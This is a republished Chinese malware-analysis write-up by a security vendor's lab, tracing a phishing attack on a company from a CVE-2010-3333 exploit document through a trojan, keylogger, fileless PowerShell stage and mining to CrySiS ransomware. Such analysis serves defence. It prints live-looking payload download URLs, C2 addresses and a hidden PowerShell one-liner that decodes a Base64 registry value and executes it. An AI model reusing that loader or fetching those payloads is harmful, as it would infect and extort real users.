从某电商钓鱼事件探索黑客“一站式服务”

深信服EDR安全团队,整理分析了一起某电商钓鱼事件,通过关联信息,发现背后可能存在一个“产业链齐全”的黑客团伙,研究发现其具备“一站式服务”的黑客攻击手段。

黑客攻击手段包括但不限于钓鱼邮件、漏洞利用、挖矿病毒、勒索病毒、无文件攻击、远控木马、键盘记录器、密码破解等,是一次完整而全套的“服务”。

最开始,可能仅仅是一封精心构造的邮件触发的,经过信息收集和远程控制,在闲时挖矿榨干主机性能,当窃取到足够机密,又最后“卸磨杀驴”“杀鸡取卵”,执行勒索操作。

0x01 定向撒网捞鱼:钓鱼邮件

XX公司已经被黑客盯上了,黑客通过社工拿到该公司的各种邮件账号,并给这些账号发送了钓鱼邮件。

员工A收到一份邮件,这是一份包含了doc附件(实际上是一份富文本文件)的邮件,doc名称为TransferCopy.doc。

以下是邮件的基本信息:

看上去是一份无害的文件,点开查看该doc,也未发现异常(但此时已经开始后台偷偷执行)。

0x02 苍蝇不叮无缝的蛋:漏洞利用

苍蝇不叮无缝的蛋,一个普通的doc文档不能触发什么,但是,那是一个特殊构造的文档,里面肯定利用了什么漏洞的。

我们将邮件样本中的Base64加密的附件b64EnTransferCopy.doc提取出来,检测Base64解码的b64DeTransferCopy.doc,发现了b64DeTransferCopy.doc文档中的特殊文本。

可以判断其利用了CVE-2010-3333,漏洞溢出后,执行了下载动作。

在doc中发现恶意下载链接:

“http://polariton.rghost.ru/download/74zJT5wtf/b878e693051a8e541381b1d6378f4ddf62b d96b3/b878e693051a8e541381b1d6378f4ddf62bd96b3/b878e693051a8e541381b1d6378f 4ddf62bd96b3/DFGHDFGHJ4567856.exe”

访问这个网址之后,会跳转到http://rgho.st/74zJT5wtf?r=1088

0x03 侦查兵先行:下载木马

渗透企业内网,免不了先侦查内部主机信息的,黑客最开始,选择了下载并执行木马,完成初步的信息收集和远程控制。

我们将这个样本下载下来,检测为.NET程序,程序没有加壳,但是经过了混淆。

通过De4dot反混淆得到如下信息,但是程序还是存在一定的混淆,采用动态分析。

动态分析程序DFGHDFGHJ4567856.exe行为,发现其执行cmd命令 cmd.exe /c systeminfo 获取系统基本信息,写入Info.txt。

释放AutoUpdate.exe并通过设置注册表,设置其为自启动,进行键鼠记录,将所有的动作记录在logs_xx.xx.xxxx(日期格式).htm文件。

释放键鼠记录器pass.exe并启动,进行密码搜集或者密码破解。

该程序在完成所有释放和启动工作后,会使用HTTP协议连接恶意C2进行交互(回传信息)。

0x04 对抗升级:无文件攻击

为了进一步对抗安全产品,黑客并未停手,采取了更为高级、更为隐蔽的攻击手段。

我们发现,其通过自启动注册表项,启动PowerShell执行相应的命令

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -c "$val = (gp HKLM:SOFTWARE\'??').'??'; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"

分析上面的命令,它会读取HKLM:SOFTWARE\’??’注册表项的内容,然后通过Base64解码之后执行,另一个注册表项的内容是一串Base64的字符串。

多次解码之后,得到相应的PowerShell源代码。

通过PowerShell脚本,创建一个线程,注入一段ShellCode到远程进程中,执行ShellCode,解密出相应的ShellCode代码。

通过InternetOpenA/InternetConnectA/HttpOpenRequestA/HttpSendRequestA等函数,连接或发送网络请求到相应的黑客服务器地址138.197.2.46

分配相应的内存空间,从黑客服务器上读取相关的恶意程序到内存。

从黑客服务器上获取到的文件:

ShellCode通过反射型DLL注入到进程执行:

分析从内存中Dump出来的文件,是一个后门程序。

后门程序,释放相应的远控恶意程序文件Folder.exe:

Folder.exe拷贝自身到C:\Users\panda\AppData\Roaming目录下:

并设置一个隐藏目录的文件夹,将文件拷贝到隐藏目录文件夹下:

并设置注册表自启动项:

将之前释放到隐藏目录下的副本远控创建为计划任务启动项:

黑客可以实时监控这台主机,动态分析显示其与远程C2服务器14.215.177.39地址进行通信。

0x05 持续褥羊毛:挖矿

黑客在攻破该主机之后,就为该主机种上挖矿病毒,持续榨干其性能。

0x06 猪养肥了就杀掉:执行勒索

在某天,黑客觉得信息偷得差不多了,挖矿也挖了一段时间,想最后干票大的。其通过远程进来之后,从网站上下载了一个勒索病毒。

下载的网站如下:

http://polariton.rghost.ru/download/74QVXtyvn/5a32f4e1983822ed5d4fcedf2b8d4c276dd77263/5a32f4e1983822ed5d4fcedf2b8d4c276dd77263/Release.zip

运行下载后的程序,会加密主机上的文件,如下所示:

并弹出勒索信息界面,研究发现这是一个CrySiS勒索病毒。

至此,全套“服务”完成,员工可以下班了。

*本文作者:千里目安全实验室,转载请注明来自FreeBuf.COM

原文发布于微信公众号 - FreeBuf(freebuf)

原文发表时间:2018-11-23

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏安恒网络空间安全讲武堂

RFID技术|门禁卡破解|IC卡破解学习过程

安全不仅仅包含网络上的安全,在我们实际生活中也同样存在很多个安全相关的事物,可以说跟科技扯上关系的事物都会有安全问题,无线,蓝牙,手机,无人机,汽车。真正有问题...

36.9K4
来自专栏walterlv - 吕毅的博客

查询已连接 Wi-Fi 的密码(入门和进阶两种方法)

2017-10-09 13:01

5762
来自专栏FreeBuf

详细分析使用Certutil解码的Office恶意软件

最近发现使用certutil进行解码的office恶意软件,这种恶意软件通过OLE机制落地通过BASE64编码的恶意软件,然后通过调用certutil来进行解码...

2784
来自专栏安恒信息

“永恒之蓝”勒索病毒安全事件应急指导手册(附工具包)

相关说明 北京时间2017年05月12日,安恒信息监测到黑客利用NSA黑客武器库泄漏的“永恒之蓝”工具发起的网络攻击事件:大量服务器和个人PC感染病毒后被远程控...

3607
来自专栏blackpiglet

Discourse 搭建

Discourse 是由 Stack Overflow 创始人之一的 Jeff Atwood 主导的开源论坛项目,使用时能感受到和 Stack Overflow...

3062
来自专栏www.96php.cn

thinkphp整合系列之微信扫码支付

thinkphp整合系列之微信扫码支付 一:导入sdk /ThinkPHP/Library/Vendor/Weixinpay 鹅厂的sdk那酸爽谁用谁知道;...

4269
来自专栏ytkah

微信公众号后台编辑器出现短暂故障 附找回素材的方法

  今天下午(大致为8月15日13:30-14:40),微信公众平台后台编辑器出现短暂故障,保存素材后会出现被清空的现象,15:30左右已全面修复。   对于因...

4136
来自专栏SAP最佳业务实践

SAP最佳业务实践:FI–总账(156)-4更改

4.4 FAGLL03显示并更改行项目 显示并更改总帐科目中的行项目。 已在定制中维护行布局变量、总计变量和选择字段。 角色:总帐会计 1. 在 总帐科...

3954
来自专栏FreeBuf

魔波广告恶意病毒简析

1.病毒介绍 魔波广告恶意病毒通过仿冒浏览器,播放器和一些游戏等进行传播,一旦用户手机不慎被感染,该病毒将立即下载提权文件来获取 root权限,频繁推送广告,监...

2305
来自专栏ml

Linux下如何查看自己的服务器有没有无线网卡

还是实验室那台破服务器,连不上网。有没有界面,所以想着如何用一些命令来链接上 热点。 当然,在linux下链接wifi没有win下那么一点就好了! ...

5075

扫码关注云+社区

领取腾讯云代金券